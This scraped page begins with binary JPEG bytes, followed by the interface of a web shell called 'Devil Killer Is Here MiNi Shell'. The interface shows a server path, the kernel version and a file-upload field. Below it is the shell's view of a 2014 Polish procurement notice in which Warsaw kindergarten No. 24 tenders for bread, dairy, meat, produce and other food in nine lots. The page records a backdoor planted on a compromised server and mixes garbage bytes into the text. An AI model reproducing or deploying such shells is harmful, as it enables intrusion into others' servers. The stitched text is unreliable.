JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141121/242497-N-2014.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 9 pakietów</b><br>
<b>Numer ogłoszenia: 242497 - 2014; data zamieszczenia: 21.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 24 , ul. Drewniana 10/16, 00-345 Warszawa, woj. mazowieckie, tel. 22 826 42 63, faks 22 826 42 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p24.przedszkola.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, nie przekraczających łącznie 20% wartości udzielonego zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena złożonego oświadczenie o spełnianiu wymagań wg kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena złożonego oświadczenie o spełnianiu wymagań wg kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena złożonego oświadczenie o spełnianiu wymagań wg kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena złożonego oświadczenie o spełnianiu wymagań wg kryterium spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena złożonego oświadczenie o spełnianiu wymagań wg kryterium spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p24.przedszkola.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 24
ul. Drewniana 10/16
00-345 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2014 godzina 10:00, miejsce: Przedszkole Nr 24
ul. Drewniana 10/16
00-345 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka długa, typu wrocławska, świeża - 250 g  szt.   900
Chałka tradycyjna, świeża - 310 g szt.	     300
Chleb biały, pszenny, świeży - 570  g	szt.	900
Chleb razowy wieloziarnisty, świeży - 500 g	szt 700
Kajzerki świeże - 50g	szt.	500
Drożdżówki - różne smaki	szt. 800
Bułki grahamki  świeże  - 350g.	szt.	880
Bułeczki ciemne z ziarnem 70 g	szt.	600
Chleb  razowy  słonecznikowy - krótki termin przydatności	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane, homogenizowane o zawartości tłuszczu 2%,  pakowane w folię o pojemności 1l  litr	4000
Mleko w kartonie 1 l UHT o zawartości tłuszczu 2%	litr	400
Masło świeże w kostkach , zawartość tłuszczu min 73%, opak. 200g. szt. 880
Masło roślinne pakowane w kubeczki plastikowe o poj. 250 g - zawartość tłuszczu 80%	szt.	375
Śmietana o zawartości tłuszczu 12% opak. Plastikowe o poj. 400 ml szt.	600
Serek twarogowy typu Almette, śmietankowy , opak. 150g.	szt.	60
Serek twarogowy typu Almette, ziołowy , opak. 150g	szt.	60
Ser topiony śmietankowy w bloczkach  100g szt	30
Ser żółty gouda tłusty, pakowany w bloczkach do 1500 g kg	75
Jogurt  naturalny  pakowany w kubeczki plastikowe o poj. 150g.	szt	3500
Ser twarogowy półtłusty - krajanka  klasa  I , pakowany  w  opakowania  papierowe  z terminem ważności 	kg	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi indyka bez skóry, elementy świeże kg 50
Udziec z indyka z kością, bez skóry elementy świeże kg	 60
Filet z kurczaka bez skóry, elementy świeże	kg 60
Kurczaki - tuszki surowe, świeże kg 10
Pałeczki z kurczaka, surowe, elementy świeże kg	100
Schab wieprzowy środkowy, bk, surowy, elementy świeże kg	70
Wieprzowina łopatka, surowa, bez kości, elementy świeże kg	20
Wieprzowina - szynka surowa, bez kości, elementy świeże kg	 50
Łopatka cielęca, bez kości, elementy świeże	kg 50
Udziec wołowy bez kości, elementy świeże kg 50
Pręga wołowa surowa, bez kości, elementy świeże	 kg 10
Polędwica wieprzowa surowa, elementy świeże kg 30
Kiełbasa sucha, typu krakowska kg 15
Kiełbasa  typu podwawelska kg 18
Parówki typu  Berlinki - produkt wędzony parzony, odtłuszczony 70% mięsa	
Kg 40
Polędwica z indyka  miodowa - wędlina	 kg 30
Szynka wieprzowa - bez tłuszczu - gotowana kg	40
Polędwica  wieprzowa typu sopocka kg	35
Kiełbasa szynkowa  wieprzowa kg 12
Pierś z indyka wędzona nie mielona typu wędlina kg 5
Szynka drobiowa - wędlina	kg 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwina świeża w pęczkach	pęczki	15
Buraki  czerwone,  świeże, bez liści, nie nadmarznięte bez   śladów uszkodzeń mechanicznych i zepsucia	kg	130
Cebula świeża bez szczypiorku, krucha nie nadmarznięta kg 100
Dynia świeża, dojrzała, bez uszkodzeń i oznak zepsucia	kg	18
Fasolka szparagowa  świeża, bez uszkodzeń	kg 32
Kalafior świeży, bez uszkodzeń, jędrny duży	szt.	100
Kapusta głowiasta, biała, świeża nie nadmarznięta, bez uszkodzeń kg	180
Kapusta kiszona - wiaderko 3 kg	kg 100
Kapusta pekińska, nie nadmarznięta, bez uszkodzeń kg	110
Kapusta włoska, nie nadmarznięta, bez uszkodzeń kg	50
Kapusta czerwona, głowiasta, nie nadmarznięta bez śladów uszkodzeń kg 50
Koper świeży, czysty w pęczkach	pęczki 250
Kalarepa  czysta, świeża  bez  uszkodzeń nie nadmarznięta	kg	10
Marchew bez naci, świeża, sucha, nie nadmarznięta, bez śladów uszkodzeń	
kg 800
Natka pietruszki, czysta, świeża w pęczkach	szt.	320
Ogórki  świeże, czyste bez uszkodzeń	kg	170
Ogórki kwaszone, jędrne w  wiaderku - 3 kg	 kg	150
Ogórki małosolne, pakowane w wiaderko - 3 kg	kg	8
Papryka czerwona słodka świeża, zdrowa bez uszkodzeń kg 75
Pieczarki czyste, świeże, bez uszkodzeń kg	30
Pietruszka korzeniowa, świeża bez uszkodzeń kg	250
Pomidory świeże, zdrowe bez uszkodzeń - produkt polski kg	360
Pory czyste, świeże	kg 150
Rzodkiewka czysta bez uszkodzeń, pakowana w pęczki	pęczki	340
Rzodkiew  biała  czysta bez  uszkodzeń	kg 20
Sałata zielona, czysta, zdrowa   szt.	438
Sałata lodowa, czysta, zdrowa bez uszkodzeń szt	60
Seler korzeniowy, świeży bez uszkodzeń kg	220
Szczypiorek drobny, czysty, pakowany w pęczki	pęczki 180
Ziemniaki nie  zzieleniałe , czyste, suche nie zmarznięte nie kiełkujące, bez uszkodzeń	kg 3000
Czosnek	szt.	20
Gruszki świeże, słodkie, dojrzałe bez uszkodzeń	kg 120
Jabłka kruche, słodkie nie nadmarznięte bez  śladów  uszkodzeń	kg	1500
Brzoskwinie krajowe	kg 20
Morele  krajowe	kg 30
Truskawki świeże, czyste, suche, pakowane w łubianki po 2kg kg 60
Śliwki świeże, słodkie	kg 140
Arbuzy świeże - dojrzały, bez uszkodzeń kg	40
Banany- średnio dojrzale, nie nadmarznięte bez uszkodzeń mechanicznych	
kg 600
Cytryny świeże, dojrzale bez oznak zepsucia, bez uszkodzeń mechanicznych	
kg 30
Cukinia - świeża nie  nadmarznięta, bez śladów uszkodzeń mechanicznych i zepsucia	kg 30
Grejpfruty -  świeżenie nadmarznięte, bez śladów uszkodzeń mechanicznych i zepsucia	kg 50
Mandarynki - bez pestek, słodkie nie nadmarznięte bez uszkodzeń mechanicznych	kg 170
Pomarańcze - świeże, słodkie nie nadmarznięte, bez śladów uszkodzeń mechanicznych i zepsucia	kg	30
Winogrona zielone, świeże, bez pestek, słodkie, nie zepsute  bez śladów uszkodzeń mechanicznych	kg 50
Melony dojrzale, nie nadmarznięte , bez śladów uszkodzeń mechanicznych	
kg	30
Nektarynki dojrzale, nie nadmarznięte, bez śladów uszkodzeń mechanicznych	
kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry w syropie puszka 565g	szt.	25
Brzoskwinie połówki w puszce  820 g	szt.	25
Bułka tarta - 400 g	szt.	250
Biszkopty delikatne, długie, bez nadzienia pakowane w folię 150 g bez konserwantów	szt.	38
Biszkopty okrągłe, bez nadzienia - 150 g - bez konserwantów	szt.	60
Cynamon  mielony pakowany w torebki  30g	 szt.	13
Chrzan  tarty w słoikach bez konserwantów  260 g szt.	8
Ciastka  owsiane - pakowane w opakowania 250 g bez konserwantów szt. 60
Cukier biały, sypki, pakowany w torby a 1000g	szt.	400
Cukier puder a 500 g 	szt.	25
Cukier waniliowy a 32 g.	szt.	240
Drożdże świeże pakowane po 100 g	szt.	40
Dżem owocowy  niskosłodzony z   zawartością owocu 45 g w 100g wyrobu gotowego słoik ok. 280g	szt.	100
Galaretka - bez sztucznych barwników i konserwantów ok.75 g szt.	60
Groszek konserwowy - puszka ok. 400 g - produkt polski szt.	 20
Groch nasiona suche bez zanieczyszczeń kg	20
Herbata owocowa - ekspresowa, nie granulowana różne smaki, pakowana  w kartony po 20 szt. - 80 g	szt.	260
Herbata zielona pakowana w opakowania po 20 szt.	szt.	80
Herbata czarna bez dodatków ekspresowa pakowana w paczki po 25 torebek szt.	20
Kasza jaglana pakowana w torby po  400 g.	szt	30
Kasza jęczmienna mazurska pakowana w torby - 900 g. kg 70
Kakao naturalne  o obniżonej zawartości tłuszczu  - pudelka - 100g szt.	100
Kasza gryczana  900 g kg	50
Kasza manna  400 g	kg	30
Kawa zbożowa  pakowana  w opakowania po  20 szt. szt. 40
Kawa  Inka  pakowana w opakowania  po  150 g.	szt	30
Koncentrat pomidorowy 30% - w słoikach  - 190g. szt.	180
Kukurydza konserwowa - puszki - 425g. szt.	 15
Liście laurowe  - suszone, torebki - 20g. szt.	 12
Majeranek 14 g	szt.	20
Majonez jogurtowy  w słoiku - 200g szt. 20
Marmolada wieloowocowa - pakowana w opakowania plastikowe  po  500g.	
szt.	10
Makaron świderki- 4 jajeczny - 500g bez sztucznych barwników kg	       200
Makaron krajanka 4 jajeczny - 400g. bez sztucznych barwników kg         50
Makaron  nitki - 4 jajeczny - 250 g bez sztucznych barwników kg          32
Makaron  muszelki - 4 jajeczny - 500g bez sztucznych barwników kg	50
Makaron  pełnoziarnisty świderki pakowany w opak.  400 g 
bez sztucznych barwników szt.         25
Mąka pszenna 1000g	kg 375
Mąka ziemniaczana 500g.	kg	40
Mięta ekspresowa, pakowana po 20 saszetek - 40 g	
szt.	70
Rumianek  ekspresowy pakowany po  20 sztuk	      szt.	30
Miód pszczeli naturalny wielokwiatowy  w słoiku 280 g	szt.	20
Musztarda  łagodna w słoiku -  200g.	szt.	8
Olej rzepakowy z pierwszego tłoczenia   - butelki o pojemności  1l.	litr	180
Oliwa z oliwek pierwszego  tłoczenia do sałatek - butelki o pojemności 
0,50 l.	Szt.	10
Pieprz prawdziwy, czarny, mielony - 20g. szt. 40
Fasola sucha - średnio-gruba  - 400g. bez zanieczyszczeń szt.	25
Płatki orkiszowe ekologiczne pakowane w torebki  400 g. szt	40
Płatki owsiane a naturalne 400g	szt.	50
Płatki ryżowe  - 400 g	szt.	90
Płatki jęczmienne  - 400 g 	szt.	65
Przyprawa do piernika pakowana w torby po 25  szt.	10
Torciki waflowe czekoladowe szt.	150
Proszek do pieczenia  - 18 g. szt.	 90
Przyprawa - bazylia suszona  torebki - 10g	szt.	15
Przyprawa - tymianek suszony - torebki - 10 g.	szt.	15
Przyprawa - papryka słodka, mielona - 20 g	szt.	40
Przyprawa  - rozmaryn  suszony - torebki  20g.	Szt.	10
Przyprawa - Imbir mielony - pakowany w torebki 20g.	szt	5
Rodzynki suszone 200g	szt.	50
Ryż biały długoziarnisty, sypki, pakowany w torby I klasa  - 1000g	kg	90
Ryż  brązowy  naturalny pakowany w torby po 400 g.	szt.	80
Sok owocowy 100% , kartonik - 200 ml	szt.	300
Sól kamienna  - torby  - 1000g	Kg	90
Czosnek  mielony - przyprawa - 35 g. 	szt.	18
Szczaw konserwowy - słoik 270g	szt.	38
Wiórki kokosowe - torebki - 75 g	szt.	13
Zacierki - makaron - 4 jajeczny bez sztucznych barwników 250g	szt.	38
Ziele angielskie a 15g	szt.	8
Żurek typu śląski bez konserwantów, butelki 480ml szt.	 90
Przyprawa - pieprz  ziołowy  20g.	 szt.	18
Makaron Spaghetti  - 400g.	szt.	50
Króliki czekoladowe wielkanocne z czekolady naturalnej  ok. 50% miazgi kakaowej z naturalnymi dodatkami smakowymi	    szt.	150
Mikołajki czekoladowe bożonarodzeniowe z czekolady naturalnej  ok. 50% miazgi kakaowej z naturalnymi dodatkami smakowymi	szt.	150
Czekolada naturalna -  gorzka z dodatkiem ok. 70% miazgi kakaowej z naturalnymi dodatkami smakowymi - 100g.	szt. 	75
Czekolada naturalna  bez dodatków deserowa z naturalnymi dodatkami smakowymi - 100g.	szt.	75
Ziarno dyni suszone, torebki  100 g	szt.	60
Orzechy włoskie łuskane, torebki 100 g	szt.	60
Ziarno  słonecznika suszone  torebki 100 g	zt.	60
Orzechy laskowe torebki 100 g	szt.	150
Syrop domowy, wiśniowy, bez konserwantów butelki 430 ml.	szt.	30
Ciastka wafelki w polewie czekoladowej na wagę, bez konserwantów	kg.	12
Ciastka kruche na wagę bez konserwantów  i sztucznych barwników	kg.	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, ściółkowe - waga 63-73g - badane pod względem jakości i przydatności do spożycia, pakowane - op. transportowe po 30 sztuk szt. 7500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet  z    dorsza  świeży bez skóry   nie  mrożony  gatunek  I  kg	    120
Filety z  Mintaja mrożone  bez  skóry -  mrożone pojedynczo, bez wody, bez  lodu  gat.  I   -  nie głęboko mrożony	kg       80
Paluszki rybne mrożone,  panierowane - mięso rybne nie mielone  gat.  I  kg 25
Makrela wędzona, pakowana pojedynczo  w folie, z terminem ważności gatunek  I,   	kg	       20
Łosoś  surowy bez skóry, bez ości - filety świeże nie mrożone  gat.  I kg	      20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czarna porzeczka mrożona - op.  2,5 kg kg 80
Truskawki mrożone - op.  2,5 kg	kg 65
Wiśnie mrożone - op. 2,5 kg	kg	80
Mieszanka wieloowocowa - owoce polskie - op. 2,5 kg 20
Fasolka szparagowa - op. 2,5 kg kg 40
Kalafior mrożony - op. 2,5 kg kg 50
Mieszanka wielowarzywna kalafior, brokuły, fasola, marchew op. 2,5 kg kg 30
Brokuły mrożone - op. 2,5 kg kg	30
Włoszczyzna krojona  - op. 450 g szt.	50
Szpinak mrożony - op. 450g szt.	30
Marchewka  mrożona, krojona w kostkę - op. 450g.	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Woda źródlana.</p>
